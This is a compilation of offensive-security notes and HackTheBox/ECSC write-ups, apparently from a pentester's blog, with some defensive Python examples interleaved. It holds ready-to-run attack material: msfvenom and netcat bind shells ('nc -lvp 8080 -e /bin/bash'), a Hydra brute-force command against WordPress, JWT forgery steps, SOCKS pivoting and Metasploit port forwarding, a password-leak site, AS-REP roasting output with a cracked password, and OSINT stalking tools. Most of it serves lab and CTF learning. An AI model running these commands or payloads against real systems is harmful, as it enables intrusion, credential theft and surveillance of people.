Channel: w4cky - BST

IT reconnaissance


Notes from SHP

gotcha.pw - password leaks (download the database without asterisks? Yes)
https://www.zoomeye.org/ / shodan: (zoomeye: +django +debug.) (in shodan: has_screenshot:yes)
crt.sh - %domain.pl (finds subdomains)
builtwith.com/ - shows which technologies the infrastructure is built from;
the relationship profile tab shows tracking codes and the other sites that use them :)
hardenize.com - security scanner
android.fallible.co - searches for secret data in a mobile app
publicwww.com - search engine for HTML, CSS and JavaScript source code; here we search e.g. for malware etc., look for API keys (by typing apikey into the search)

github.com/michenriksen/aquatone - finds subdomains (searches everywhere: virustotal (you need to provide an API key), crt.sh, webarchive, etc.)

Virustotal.com - search: twitter.com (for finding subdomains) / also finding virtual domains by clicking on an IP in the search results
archive.org - finding old links to current resources, when there is already a new site but an old resource may have been left behind; also finding subdomains


JWT - JSON Web Tokens


Notes from SHP

JWT - secure exchange of information using JSON between two apps

Decoding is plain base64 (so it does not provide confidentiality)

Httparchive

Google BigQuery and searching httparchive data (e.g. for JWT tokens, Authorization: Basic, etc.)

  1. Brute-force the JWT secret (e.g. with Hashcat)
  2. Change the JWT signing algorithm (e.g. from HS256) to none
  • Note: on JWT.io, if we enter alg none it won't show results (you have to base64-encode it yourself)
  3. Resign vuln - sign my token with an RSA private key and put the RSA public key in the header

A JWT LOOKS LIKE THIS:  HEADER.PAYLOAD.SIGNATURE



sekurak.pl/jwt-ebook.pdf <- description of JWT together with a checklist
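As an added example (not part of the SHP notes), a verifier that closes the three issues listed above: the server fixes the algorithm instead of trusting the token's alg (so alg none is rejected), key material carried in the header is refused (the resign vuln), and the HS256 signature is compared in constant time. The secret and payloads are constructed for the example; the unpadded base64url helpers are the encoding step JWT.io makes you do by hand.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed server-side HMAC secret for this example (not from the original notes).
SERVER_SECRET = b"example-server-secret-do-not-reuse"

# Header fields that let a token carry its own verification key; honouring them
# is the "resign" vulnerability from the notes above.
KEY_CARRYING_HEADERS = ("jwk", "jku", "x5c", "x5u")


def b64url_encode(raw: bytes) -> str:
    """JWT uses unpadded base64url (RFC 7515), not plain base64."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Restore the padding that b64url_encode stripped before decoding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_json(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def make_hs256_token(payload: dict, secret: bytes) -> str:
    """Issue HEADER.PAYLOAD.SIGNATURE with HS256 (HMAC-SHA256 over the first two parts)."""
    signing_input = encode_json({"alg": "HS256", "typ": "JWT"}) + "." + encode_json(payload)
    signature = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(signature)


def alg_none_variant(token: str, new_payload: dict) -> str:
    """Rewrite a token the way step 2 above describes (alg=none, new payload, empty
    signature); used here only to show that verify_hs256_token rejects it."""
    return encode_json({"alg": "none", "typ": "JWT"}) + "." + encode_json(new_payload) + "."


def verify_hs256_token(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload if the token is a genuine HS256 token under `secret`, else None.

    The server decides the algorithm; the token's `alg` only has to agree with it.
    That closes both the alg=none bypass and the RSA-public-key-in-header (resign) bypass.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, signature_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        given_signature = b64url_decode(signature_b64)
    except ValueError:  # bad base64, bad JSON or non-ASCII input
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None  # "none", RS256 or anything else the server did not choose
    if any(field in header for field in KEY_CARRYING_HEADERS):
        return None  # never let the token supply its own verification key
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("utf-8"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, given_signature):
        return None  # wrong secret, or header/payload tampered with
    try:
        payload = json.loads(b64url_decode(payload_b64))
    except ValueError:
        return None
    return payload if isinstance(payload, dict) else None


if __name__ == "__main__":
    token = make_hs256_token({"sub": "user", "admin": False}, SERVER_SECRET)
    print("genuine :", verify_hs256_token(token, SERVER_SECRET))
    forged = alg_none_variant(token, {"sub": "user", "admin": True})
    print("alg=none:", verify_hs256_token(forged, SERVER_SECRET))
```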

Android - dynamic analysis of applications

Hardening firefox

[about:config]
privacy.firstparty.isolate = true
privacy.resistFingerprinting = true
privacy.trackingprotection.enabled = true
privacy.donottrackheader.enabled = true
privacy.donottrackheader.value = 1
browser.cache.disk.enable = false
browser.cache.disk.filesystem_reported = 1
browser.cache.disk.smart_size.first_run = false
browser.cache.disk.cache_ssl = false
browser.cache.disk.frecency_experiment = 2
browser.cache.offline.enable = false
browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.send_pings = false
browser.sessionstore.max_tabs_undo = 0
browser.urlbar.speculativeConnect.enabled = false
browser.sessionstore.privacy_level = 2
browser.privatebrowsing.autostart = true
browser.safebrowsing.appRepURL = (empty)
dom.battery.enabled = false
dom.event.clipboardevents.enabled = true
dom.indexedDB.enabled = false
dom.storage.enabled = false
geo.enabled = false
geo.wifi.uri = (empty)
media.navigator.enabled = false
network.cookie.cookieBehavior = 1
network.cookie.lifetimePolicy = 2
network.http.referer.trimmingPolicy = 2
network.http.referer.XOriginPolicy = 2
network.http.referer.XOriginTrimmingPolicy = 2
network.prefetch-next = false
network.http.referer.spoofSource = true
network.dns.disablePrefetch = true
network.IDN_show_punycode = true
webgl.disabled = true
beacon.enabled = false
media.video_stats.enabled = false
media.peerconnection.enabled = false
media.peerconnection.dtmf.enabled = false
media.peerconnection.ice.default_address_only = true
media.peerconnection.ice.no_host = true
media.peerconnection.identity.enabled = false
media.peerconnection.simulcast = false
media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.video.vp9_enabled = false
security.ssl3.rsa_aes_128_sha = false
security.ssl3.rsa_aes_256_sha = false
security.ssl3.rsa_des_ede3_sha = false
general.useragent.site_specific_overrides = true


Plugins:

https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/
https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/ 



Check your browser's properties with:

https://check.torproject.org/
https://ip-check.info/?lang=en
https://ipleak.net/

bind shell



msfvenom bind shell:

victim:
msfvenom -p linux/x64/shell_bind_tcp  LPORT=2222  -f elf > shell.elf
./shell.elf

attacker:
nc IP_VICTIM 2222
python -c 'import pty;pty.spawn("/bin/bash")'

OR

msf exploit(multi/handler) > use multi/handler
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2222
[*] Command shell session 3 opened (10.0.3.15:46445 -> 172.21.65.139:2222) at 2018-12-12 11:54:51 +0100


ls
dirtyc0w




netcat:
nc -lvp 8080 -e /bin/bash <- victim
nc IP_VICTIM 8080<-- attacker


Bind shell meterpreter

victim:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=2223 -f elf > shell_meterpreter_bind_2223.elf
chmod +x shell_meterpreter_bind_2223.elf
./shell_meterpreter_bind_2223.elf

attacker:
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2223             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2223
[*] Sending stage (861480 bytes) to 172.21.65.139
[*] Meterpreter session 6 opened (10.0.3.15:41461 -> 172.21.65.139:2223) at 2018-12-12 12:04:01 +0100

meterpreter >
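Seen from the host being defended, an added example (not part of the original notes) that audits `ss -tlnp` output and flags listening sockets that look like the msfvenom (port 2222/2223) and netcat (port 8080) bind shells above. The `ss` lines, the expected-listener table and the process-name list are constructed for the example.

```python
import re
from typing import Dict, List, NamedTuple

# Constructed `ss -tlnp` output in the layout the real tool prints; the two odd
# listeners mirror the msfvenom elf and the `nc -lvp 8080 -e /bin/bash` shells above.
SS_OUTPUT = """\
State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port  Process
LISTEN  0       128      0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=901,fd=21))
LISTEN  0       1        0.0.0.0:2222         0.0.0.0:*          users:(("shell.elf",pid=4321,fd=3))
LISTEN  0       1        0.0.0.0:8080         0.0.0.0:*          users:(("nc",pid=4400,fd=3))
LISTEN  0       128      [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
"""

# Ports this (constructed) host is expected to expose, keyed by the process that should own them.
EXPECTED_LISTENERS: Dict[int, str] = {22: "sshd", 3306: "mysqld"}

# Processes that have no business owning a listening socket on a server.
SHELL_LIKE = {"nc", "ncat", "netcat", "socat", "sh", "bash", "dash", "zsh",
              "python", "python3", "perl"}

LINE_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


class Finding(NamedTuple):
    port: int
    process: str
    pid: int
    reasons: List[str]


def audit_listeners(ss_text: str) -> List[Finding]:
    """Return one Finding per LISTEN socket that deviates from the expected set."""
    findings: List[Finding] = []
    for line in ss_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or a socket without process info
        addr, port = m["addr"], int(m["port"])
        proc, pid = m["proc"], int(m["pid"])
        reasons: List[str] = []
        if proc in SHELL_LIKE:
            reasons.append(f"listening socket owned by shell/netcat process '{proc}'")
        expected = EXPECTED_LISTENERS.get(port)
        if expected is None:
            reasons.append(f"port {port} is not an expected service port")
        elif expected != proc:
            reasons.append(f"port {port} owned by '{proc}', expected '{expected}'")
        # A suspicious listener bound to all addresses is reachable from the network.
        if reasons and not addr.startswith(("127.", "[::1]")):
            reasons.append("bound to all addresses, reachable from the network")
        if reasons:
            findings.append(Finding(port, proc, pid, reasons))
    return findings


if __name__ == "__main__":
    for finding in audit_listeners(SS_OUTPUT):
        print(f"port {finding.port} pid {finding.pid} ({finding.process}):")
        for reason in finding.reasons:
            print("   -", reason)
```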

Hydra cheat sheet

Wordpress:

hydra -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'
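An added detection example (not from the cheat sheet): the hydra command above treats a Location redirect as success, because wp-login.php answers a failed login with 200 and a successful one with a redirect, and the same fact lets a defender spot the attack in the web server's access log. The log lines, IP addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Combined log format as written by Apache/nginx; method, path and status are all we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def _log_line(ip: str, when: datetime, status: int) -> str:
    """Build one constructed POST /wp-login.php access-log line."""
    return (f'{ip} - - [{when.strftime(TS_FORMAT)}] "POST /wp-login.php HTTP/1.1" '
            f'{status} 3214 "-" "Mozilla/5.0"')


def constructed_log() -> List[str]:
    """Constructed sample: one host fires 12 failed logins (200) in 11 s and then gets a
    302; a second host logs in normally after a single typo."""
    t0 = datetime(2020, 2, 12, 17, 45, 4, tzinfo=timezone(timedelta(hours=1)))
    lines = [_log_line("203.0.113.7", t0 + timedelta(seconds=i), 200) for i in range(12)]
    lines.append(_log_line("203.0.113.7", t0 + timedelta(seconds=12), 302))
    lines.append(_log_line("198.51.100.4", t0 + timedelta(seconds=30), 200))
    lines.append(_log_line("198.51.100.4", t0 + timedelta(seconds=45), 302))
    lines.append('198.51.100.4 - - [12/Feb/2020:17:46:00 +0100] "GET /wp-admin/ HTTP/1.1" '
                 '200 8811 "-" "Mozilla/5.0"')
    return lines


def detect_wp_login_bruteforce(lines: List[str], threshold: int = 10,
                               window: timedelta = timedelta(seconds=60)) -> Dict[str, dict]:
    """Alert on IPs with at least `threshold` failed wp-login POSTs inside any `window`,
    and record whether a redirect (a successful login) followed the failures."""
    posts = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != "/wp-login.php":
            continue
        posts[m["ip"]].append((datetime.strptime(m["ts"], TS_FORMAT), int(m["status"])))

    alerts: Dict[str, dict] = {}
    for ip, events in posts.items():
        events.sort()
        failures = [ts for ts, status in events if status == 200]
        peak, start = 0, 0
        for end in range(len(failures)):  # sliding window over failure timestamps
            while failures[end] - failures[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_failure = failures[-1]
            alerts[ip] = {
                "failed_attempts": len(failures),
                "peak_per_window": peak,
                "success_after_failures": any(
                    status in (301, 302, 303) and ts > last_failure for ts, status in events),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_wp_login_bruteforce(constructed_log()).items():
        print(ip, info)
```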

Pivoting


If you need to reach local-network resources from a server on which you have obtained a shell, use 3proxy

On the server where you got the shell:

wget https://github.com/z3APA3A/3proxy/archive/0.8.12.tar.gz
tar zxvf 0.8.12.tar.gz
cd 3proxy
make -f Makefile.Linux
cp src/3proxy . 
printf "auth none\nsocks -p31337\n"> 3conf
./3proxy 3conf & 



You now have a SOCKS proxy listening on port 31337 and can use e.g. proxychains


BONUS:
https://github.com/klsecservices/rpivot  <- reverse proxy

Port forwarding in Linux, e.g. for Metasploit

When attacking an external target you will often encounter the following infrastructure:
- Computer A - victim
- Computer B - intermediary server
- Computer C - attacker

To pass the connection from A to C, use SSH port forwarding

To do this, on computer B:

add GatewayPorts yes to /etc/ssh/sshd_config
and restart sshd

On computer C run:

ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b

On computer C start e.g. multi/handler with
LHOST -> ip_of_computer_C
LPORT -> port 4444


On computer B run the payload with the options:
LHOST -> ip_of_computer_B
LPORT -> port 8888


Problem with Metasploit using an SSL Certificate (HandlerSSLCert)

If you want to use your own certificate with Metasploit, for example with windows/meterpreter/reverse_https, use auxiliary/gather/impersonate_ssl, but first change the OpenSSL setting in your OS.

in /etc/ssl/openssl.cnf

from
CipherString=DEFAULT@SECLEVEL=2
to 
CipherString=DEFAULT 


Merge DLL files into EXE

https://www.youtube.com/watch?v=a_r3tQ06xpE

C:\Program Files (x86)\Microsoft\ILMerge>ILMerge.exe C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\SSHapp.exe C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\Renci.SshNet.dll /out:C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\zobaczSam.exe /target:exe /targetplatform:"v4,C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.0"

Download ILMerge: https://www.microsoft.com/en-us/download/confirmation.aspx?id=17630

European Cyber Security Challenge 2019 Safe Ninja - writeup

Every year, under the leadership of the European Union Agency for Network and Information Security, a European IT security exercise is held: the European Cyber Security Challenge. In 2019, national teams from 19 EU and EFTA countries will take part. The finals will be held in Bucharest, and the national qualifiers are run by CERT Polska, part of the Research and Academic Computer Network.

Below I show how to solve one of the tasks - Safe Ninja


This task contains a classic SSTI vulnerability. It can be spotted quickly by e.g. submitting the expression {{1+334}}, which returns 335. Next you need to check which template engine is in use. I happened to be working on another SSTI vulnerability at the time, so I immediately checked {{config}}, which pointed me at the Jinja2 template engine.

After that it was downhill, and the results are shown below. Admittedly it took me quite a while to find the flag. At first I did not notice another of the url_map addresses and tried other SSTI tricks, such as reading files or connecting to a shell, but that was not the way. The flag itself was hidden in the cookies.



POST / HTTP/1.1
Host: safeninja.ecsc19.hack.cert.pl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://safeninja.ecsc19.hack.cert.pl/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------31681657624019
Content-Length: 337

-----------------------------31681657624019
Content-Disposition: form-data; name="title"

121
-----------------------------31681657624019
Content-Disposition: form-data; name="content"; filename="systemy.html"
Content-Type: text/plain

{{url_for.__globals__.current_app.__dict__}}
-----------------------------31681657624019--



HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jun 2019 06:58:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 1017

<html>
<head>
<link crossorigin="anonymous" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" rel="stylesheet"></link>
<title>Create new web page</title>
</head>
<body>
<div class="container">
<h1>
Create new web page</h1>

<div>
<a href="https://www.blogger.com/page/feac7744bd048510f979b1475c53c079661ef0153f7c91b80a43a8f66d63e9e8">/page/feac7744bd048510f979b1475c53c079661ef0153f7c91b80a43a8f66d63e9e8</a>
</div>

<form enctype="multipart/form-data" method="POST">
    <div class="form-group">
    <label for="title">Title</label>
<input class="form-control" id="title" name="title" placeholder="Title" type="text" />
</div>
<div class="form-group">
    <label for="content">Content (only valid HTML files, no malware allowed)</label>
<input class="form-control-file" id="content" name="content" type="file" />
</div>
<button class="btn btn-primary" type="submit">Submit</button>
</form>
</div>
</body>
</html>





ECSC 2019 SAFE NINJA


root@kali:~# curl https://safeninja.ecsc19.hack.cert.pl/giiXXXXXXXXXXXXXXXX -I
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jun 2019 07:10:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Set-Cookie: flag="ecsc19{it's_not_safeXXXXXXXXXXXXXXXX}"; Path=/

OSINT links

https://github.com/jivoi/awesome-osint
https://start.me/p/rxRbpo/ti
https://www.osintdfir.com
https://www.faxvin.com/license-plate-lookup
https://knowem.com/
https://checkusernames.com/
https://stalkscan.com/
https://tineye.com/
https://www.genymotion.com/
Instagram search tool .. https://web.stagram.com/
http://onstrat.com/osint/
https://code.google.com/archive/p/theharvester/
https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit#heading=h.kmtmtyoi48ch
https://github.com/Ph055a/awesome_osint
https://osintframework.com/

HackTheBox - Emdee five for life - WriteUp


import requests
import hashlib


# One Session: the challenge string changes per request, so the hash must be
# submitted over the same session that fetched it
s = requests.Session()
r = s.get("http://docker.hackthebox.eu:37358")
print(r.status_code)
print(r.text)


# Cut the challenge string out of the page: it sits between the h1 and the closing h3
postString0 = r.text.split("\n", 5)[5]
postString1 = postString0.split("<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>", 1)[1]
kodzik = postString1.split("</h3>", 1)[0]


print("kodzik from website:")
print(kodzik)


kodzikMd5 = hashlib.md5(kodzik.encode('utf-8')).hexdigest()

print("kodzik md5:")
print(kodzikMd5)


# Send the hash as a form field (a dict), not as the literal string 'hash=kodzikMd5'
p5 = {'hash': kodzikMd5}

r5 = s.post("http://docker.hackthebox.eu:37358", data=p5)
print(r5.text)

Obtaining an IPv6 address from FTP ipv4 using FXP (rfc2428)


One of the tasks from HackTheBox gave me such a puzzle to solve. It is possible. I spent some time on this because I didn't issue the LIST command. See how it is done correctly :)




220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 500 allowed.
220-Local time is now 03:50. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (10.10.10.156:root): z3G3sJaXD4ktiQgLnXgdVWUUyiuOQpsH
331 User z3G3sJaXD4ktiQgLnXgdVWUUyiuOQpsH OK. Password required
Password:
230-This server supports FXP transfers
230-OK. Current restricted directory is /
230-0 files used (0%) - authorized: 10 files
230 0 Kbytes used (0%) - authorized: 1024 Kb
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote EPRT |1|10.10.10.156|2222|
200-FXP transfer: from 10.10.16.25 to 10.10.10.156
200 PORT command successful
ftp> quote EPRT |2|2001:41d0:52:a00::e66|2222|
200-FXP transfer: from 10.10.10.156 to 2001:41d0:52:a00::e66%176
200 PORT command successful
ftp> quote EPRT |1|10.10.10.156|2222|
200-FXP transfer: from 2001:41d0:52:a00::e66%176 to 10.10.10.156
200 PORT command successful
ftp> quote EPRT |2|dead:beef:4::1017|2222
200-FXP transfer: from 10.10.10.156 to dead:beef:4::1017%144
200 PORT command successful
ftp> LIST
?Invalid command
ftp> quote LIST
425 Could not open data connection to port 2222: Connection refused
ftp>

tcpdump -lni tun0 -vvvvvvv ip6                                                                                                                                                                                                            
tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
09:55:07.164353 IP6 (flowlabel 0xcf7d1, hlim 63, next-header TCP (6) payload length: 40) dead:beef::250:56ff:feb9:ec5b.34992> dead:beef:4::1017.2222: Flags [S], cksum 0x3463 (correct), seq 3989541210, win 28800, options [mss 1335,sackOK,TS val 1241233758 ecr 0,nop,wscale 7], length 0
09:55:07.164413 IP6 (flowlabel 0x8ed8b, hlim 64, next-header TCP (6) payload length: 20) dead:beef:4::1017.2222 > dead:beef::250:56ff:feb9:ec5b.34992: Flags [R.], cksum 0x0f90 (correct), seq 0, ack 3989541211, win 0, length 0
09:55:07.164503 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 24) fe80::7335:993e:8d3e:de92 > ff02::1:ff00:0: [icmp6 sum ok] ICMP6, neighbor solicitation, length 24, who has ::
09:55:07.164508 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 24) fe80::7335:993e:8d3e:de92 > ff02::1:ff00:0: [icmp6 sum ok] ICMP6, neighbor solicitation, length 24, who has ::
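An added example (not from the post): a strict RFC 2428 EPRT parser together with the server-side check that the Pure-FTPd above does not apply, namely that the requested data address must be the control connection's own peer unless FXP is deliberately enabled. Note that the capture shows the server accepting the last EPRT without its trailing delimiter; this parser is strict and rejects it. Addresses and reply texts are constructed for the example.

```python
import ipaddress
from typing import Optional, Tuple

# RFC 2428 address-family codes; anything else draws the 522 reply the RFC prescribes.
ADDRESS_FAMILIES = {1: ipaddress.IPv4Address, 2: ipaddress.IPv6Address}


def parse_eprt(argument: str) -> Optional[Tuple[int, str, int]]:
    """Strictly parse '<d><af><d><addr><d><port><d>' and return (af, address, port).

    The delimiter is any printable ASCII character and must appear exactly four
    times, so '|2|dead:beef:4::1017|2222' (no trailing '|') is rejected here.
    """
    if len(argument) < 7:
        return None
    delim = argument[0]
    if not 33 <= ord(delim) <= 126:
        return None
    fields = argument.split(delim)
    if len(fields) != 5 or fields[0] != "" or fields[4] != "":
        return None
    _, af, address, port, _ = fields
    if not (af.isdigit() and port.isdigit()):
        return None
    port_number = int(port)
    if not 1 <= port_number <= 65535:
        return None
    return int(af), address, port_number


def handle_eprt(argument: str, control_peer: str, allow_fxp: bool = False) -> Tuple[int, str]:
    """Server-side EPRT handling: return the (code, text) reply that would be sent.

    `control_peer` is the address the control connection came from. Unless FXP is
    enabled on purpose, the data address must be that same host; this is the check
    that blocks the third-party data connections seen in the capture above.
    """
    parsed = parse_eprt(argument)
    if parsed is None:
        return 501, "Syntax error in EPRT argument"
    af, address_text, port = parsed
    family = ADDRESS_FAMILIES.get(af)
    if family is None:
        return 522, "Network protocol not supported, use (1,2)"
    try:
        address = family(address_text)  # e.g. IPv4Address("dead:beef::1") raises ValueError
    except ValueError:
        return 501, f"Address does not match protocol family {af}"
    if not allow_fxp and address != ipaddress.ip_address(control_peer):
        return 425, "Data connection address must match the control connection"
    return 200, f"EPRT command successful (data port {port})"


if __name__ == "__main__":
    # Constructed control-connection peer; the commands are the ones from the session above.
    for cmd in ("|1|10.10.10.156|2222|", "|2|2001:41d0:52:a00::e66|2222|",
                "|2|dead:beef:4::1017|2222", "|1|10.10.16.25|2222|"):
        print(cmd, "->", handle_eprt(cmd, "10.10.16.25"))
```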


How to upgrade LND - Lightning Network [Linux]

Recently I asked how to update LND to the latest version. He gave me the answer. And I made a small blog post for others. This post is for people who build their LND from sources.

0. upgrade GO

$ sudo rm -rf /usr/local/go
$ sudo tar -C /usr/local -xzf /home/nikhita/Downloads/go1.8.1.linux-amd64.tar.gz
$ echo $PATH | grep "/usr/local/go/bin"
1.  stop LND from running
$ lncli stop

2.  cd $GOPATH/src/github.com/lightningnetwork/lnd
$ cd $GOPATH/src/github.com/lightningnetwork/lnd
$ git fetch
$ git checkout v0.8.0-beta
$ make && make install

3.  run LND
$ lnd --configfile=/home/w4cky/.lnd/lnd.conf


XSS in practice - deanonymisation

Searching for readable files on network shares - PowerShell

$REMOTE_HOST = "172.21.56.235"

# File patterns worth checking for read access; -Include expects an array of patterns,
# not one comma-separated string
$FILE_TYPES = "*.pst", "*.conf"

# 'Dysk' is the share-type column of `net view` on a Polish-locale Windows ('Disk' in English);
# adjust the pattern for your locale
net view \\$REMOTE_HOST\ |
ForEach-Object {
    $path = [regex]::match($_, '(.*)       Dysk').Groups[1].Value.Trim()

    if ($path -ne "") {
        Write-Host ("### PATH: " + $path)
        Get-ChildItem -Path \\$REMOTE_HOST\$path -Include $FILE_TYPES -Recurse -ErrorAction Ignore |
        ForEach-Object {
            Try {
                # Opening for read and closing immediately tests the effective read permission
                [System.IO.File]::OpenRead($_.FullName).Close()
                Write-Host $_.FullName
            }
            Catch {
                # Not readable by the current user
                #Write-Host ("Niet: " + $_.FullName)
            }
        }
    }
}



//Author: hagier

Turbo intruder sample code

def queueRequests(target, wordlists):
    # RequestEngine and table are globals provided by the Turbo Intruder extension
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    # Queue the same request 1000 times (e.g. to test rate limiting or a race condition)
    for i in range(1000):
        engine.queue(target.req)

    engine.start()


def handleResponse(req, interesting):
    # Only responses containing the marker string "cos" are kept in the results table
    if "cos" in req.response:
        table.add(req)

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All the fun is in enumeration. Start by enumerating employee accounts; the website turns out to be useful.






root@kali:/opt/kerbrute/dist# ./kerbrute_linux_amd64 userenum --dc 10.10.10.175 --domain EGOTISTICAL-BANK.local --delay 80 --safe -v -t 148 /tmp/logins


2020/03/19 20:27:25 >  [!] steven.kerb@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [!] scoins@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2020/03/19 20:27:26 >  [!] sdriver@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 >  [!] btaylor@EGOTISTICAL-BANK.LOCAL - User does not exist



root@kali:/opt/dirsearch# smbclient -L 10.10.10.175 -U 'egotistical-bank.local\fsmith'
Enter EGOTISTICAL-BANK.LOCAL\fsmith's password:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
print$          Disk      Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer   We cant print money
SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
       

Thestrokes23     ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)

python3 GetNPUsers.py -dc-ip 10.10.10.175 egotistical-bank.local/ -usersfile /tmp/logins2  -format john -outputfile /tmp/responses.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kali:/opt/impacket/examples# cat /tmp/responses.txt
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:3dd2da95be95ab8337aca2d69e61c55c$[...]

root@kali:/opt/impacket/examples# python3 lookupsid.py -target-ip 10.10.10.175 fsmith:Thestrokes23@egotistical-bank
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at egotistical-bank
[*] StringBinding ncacn_np:egotistical-bank[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2966785786-3096785034-1186376766
498: EGOTISTICALBANK\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: EGOTISTICALBANK\Administrator (SidTypeUser)
501: EGOTISTICALBANK\Guest (SidTypeUser)
502: EGOTISTICALBANK\krbtgt (SidTypeUser)
512: EGOTISTICALBANK\Domain Admins (SidTypeGroup)
513: EGOTISTICALBANK\Domain Users (SidTypeGroup)
